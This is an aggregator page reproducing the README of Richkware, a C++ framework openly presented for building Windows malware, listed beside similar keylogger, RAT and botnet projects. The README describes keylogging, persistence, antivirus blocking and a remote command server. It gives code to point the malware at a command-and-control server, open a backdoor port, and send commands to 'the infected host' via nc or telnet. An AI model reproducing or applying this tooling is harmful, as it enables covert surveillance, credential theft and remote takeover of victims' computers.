GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → richkmeli → Richkware

richkmeli / Richkware

Licence: apache-2.0
Framework for building Windows malware, written in C++

Programming Languages

c
50402 projects - #5 most used programming language
cpp
1120 projects

Labels

windowsframeworkbothackingmalwarehackerkeyloggervirus

Projects that are alternatives of or similar to Richkware

Spytrojan keylogger
[Solo para programadores] Troyano espía | Keylogger solo para Windows, se replica en el sistema y se inicia automaticamente al iniciar sesión. | Envío de registro mediante [Base de Datos], [Gmail] o [BotTelegram].
Stars: ✭ 32 (-89.84%)
Mutual labels:  bot, hacking, malware, keylogger
Inferno
🔥 Modern command line tool for malware creation on Windows
Stars: ✭ 105 (-66.67%)
Mutual labels:  hacking, malware, keylogger, virus
Telegram Rat
Windows Remote Administration Tool via Telegram. Written in Python
Stars: ✭ 201 (-36.19%)
Mutual labels:  bot, hacking, malware, virus
Gobot2
Second Version of The GoBot Botnet, But more advanced.
Stars: ✭ 431 (+36.83%)
Mutual labels:  bot, malware, keylogger, virus
Malware-with-Backdoor-and-Keylogger
👨🏻‍💻 A great tool for Ethical Hackers, a malware programmed with Backdoor and Keylogger.
Stars: ✭ 25 (-92.06%)
Mutual labels:  virus, malware, keylogger
Trojancockroach
A Stealthy Trojan Spyware
Stars: ✭ 424 (+34.6%)
Mutual labels:  malware, keylogger, virus
Ratel
RAT-el is an open source penetration test tool that allows you to take control of a windows machine. It works on the client-server model, the server sends commands and the client executes the commands and sends the result back to the server. The client is completely undetectable by anti-virus software.
Stars: ✭ 121 (-61.59%)
Mutual labels:  hacking, malware, virus
Malware
Rootkits | Backdoors | Sniffers | Virus | Ransomware | Steganography | Cryptography | Shellcodes | Webshells | Keylogger | Botnets | Worms | Other Network Tools
Stars: ✭ 156 (-50.48%)
Mutual labels:  malware, keylogger, virus
Paradoxiarat
ParadoxiaRat : Native Windows Remote access Tool.
Stars: ✭ 395 (+25.4%)
Mutual labels:  bot, hacking, keylogger
Blacknet
Free advanced and modern Windows botnet with a nice and secure PHP panel.
Stars: ✭ 271 (-13.97%)
Mutual labels:  bot, hacking, hacker
Antidebugging
A collection of c++ programs that demonstrate common ways to detect the presence of an attached debugger.
Stars: ✭ 161 (-48.89%)
Mutual labels:  hacking, malware, virus
ToxicEye
👽 Program for remote control of windows computers via telegram bot. Written in C#
Stars: ✭ 305 (-3.17%)
Mutual labels:  virus, malware, keylogger
Fe2O3
Simple prepender virus written in Rust
Stars: ✭ 84 (-73.33%)
Mutual labels:  virus, malware
Spyware
Python-based spyware for Windows that logs the foreground window activites, keyboard inputs. Furthermore it is able to take screenshots and and run shell commands in the background.
Stars: ✭ 31 (-90.16%)
Mutual labels:  malware, keylogger
claw
Source code of Claw Key logger previously sold on HackForums
Stars: ✭ 33 (-89.52%)
Mutual labels:  malware, keylogger
go-malware
Golang Virus Examples
Stars: ✭ 67 (-78.73%)
Mutual labels:  virus, malware
Cerberus
A complete Grabber, sending data to a TCP server that you have to host and stocking all in a database.
Stars: ✭ 32 (-89.84%)
Mutual labels:  virus, malware
Ragnarok
Virus Package ( For Educational Purposes )
Stars: ✭ 23 (-92.7%)
Mutual labels:  virus, malware
KeyPlexer
Capstone: Keylogger Trojan
Stars: ✭ 32 (-89.84%)
Mutual labels:  malware, keylogger
carrierwave-attachmentscanner
Adds the ability to send CarrierWave uploads to Attachment Scanner for virus and malware prevention.
Stars: ✭ 14 (-95.56%)
Mutual labels:  virus, malware
View All Similar Projects ➔

Richkware

Build status Codacy Badge

Framework for building Windows malware, written in C++.

Description

Richkware is a library of network and OS functions, that you can use to create malware. The composition of these functions permits the application to assume behaviors referable to the following types of malware:

  • Virus
  • Worms
  • Bot
  • Spyware
  • Keylogger
  • Scareware

Related Projects

Richkware-Manager-Server: Service for the management of hosts in which is present an instance of malware developed using Richkware framework.

Richkware-Manager-Client: Client of Richkware-Manager-Server, that it obtains the list of all hosts from the server and it's able to send any kind of commands to them.

Documentation

EN IT
Presentation PDF PDF
Report PDF PDF

Functions

Network

  • Server (network.h): module for the management of a multi-thread server, that allow to receive commands from Internet(Richkware-Manager-Client or console) according to the specific protocol.
    • Protocol (protocol.h):
      1. Remotely command execution (ID 1)
      2. (work in progress)
  • Network (network.h):
    • RawRequest: send a request to a server;
    • UploadInfoToRichkwareManagerServer: send information to Richkware-Manager-Server

System

  • Storage (storage.h):

    • SaveSession and LoadSession: save the application state(encrypted) to:
      • Register (SaveValueReg and LoadValueReg)
      • File (SaveValueToFile and LoadValueFromFile)
    • Persistence: install itself permanently in the system.

  • IsAdmin and RequestAdminPrivileges (richkware.h): check and require administrator privileges;

  • StealthWindow (richkware.h): hide applications;

  • OpenApp (richkware.h): open arbitrary applications;

  • Keylogger (richkware.h): stores in a file all pressed keys;

  • BlockApps e UnBlockApps (blockApps.h): block and unblock applications (antivirus, ...).

Cryptography

  • Encrypt and Decrypt (crypto.h): RC4 (default), Blowfish.
  • Encode and Decode (crypto.h): Base64 (defualt), Hex.

Other

  • RandMouse (richkware.h): move randomly the mouse cursor;
  • Hibernation (richkware.h): hibernate system.

Requirements

These are the base requirements to build and use Richkware:

Get Started

Open main.cpp, and create an instance of Richkware.

With Richkware-Manager-Server

If you have deployed RMS, you can initialize the malware as follows:

    int main() {
           Richkware richkware("Richk","DefaultPassword","192.168.99.100", "8080", "associatedUser");
            ...
            return 0;
        }

that it gets a secure key from Richkware-Manager-Server and it sets the key as encryption key. DefaultPass is used as temporary encryption key to ensure a secure communication with RMS and if the malware cannot reach the RMS for getting its encryption ket, it will use DefaultPass as encryption key.

Without Richkware-Manager-Server

Otherwise, if you haven't deployed RMS, you can use:

 Richkware richkware("Richk","richktest");

in this way, it uses "richktest" as encryption key.

Compile

After main.cpp implementation, you can compile as follows.

Using MinGW for Windows or MinGW cross compiler for Linux build environment

make

Using Microsoft C++ compiler (Visual Studio)

  • C/C++ > Preprocessor > Preprocessor Definitions, add "_CRT_SECURE_NO_WARNINGS"
  • Linker > Input > Additional Dependencies, add "Ws2_32.lib"

Examples of usage

In the following example, we call "server", a malware developed using Richkware framework and in which it has been enabled the function for creating a server, and "client", the creator(Hacker) of the malware that is trying to establish a connection with the infected PC.

Server-side

Remotely Command Execution

Call framework function StartServer in the main, it starts server on a port, in the following example is the TCP port 8000. Remember that if a port is already used by another program, you can't use that port, until the program will be stopped.

int main () {
    ...
	richkware.network.server.Start("8000");
    ...
}

Client-side

Connect using Richkware-Manager-Client

In all systems where the Java Virtual Machine is installed, you can use Richkware-Manager-Client, otherwise if it's not present you can easily use a terminal.

Connect using terminal in Unix systems

In Unix systems, you can use netcat, and run the following command:

nc <serverName> 8000

if the server received the request on the open port and it succeeds to create a connection, it responses to the client confirming the establishment of the connection, after that, you can write:

[[1]]COMMAND

where COMMAND is a command that has to be executed on the infected host where server is running.

Connect using terminal in Windows

In Windows, you can use telnet, in the same way:

telnet <serverName> 8000

...

[[1]]COMMAND
Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].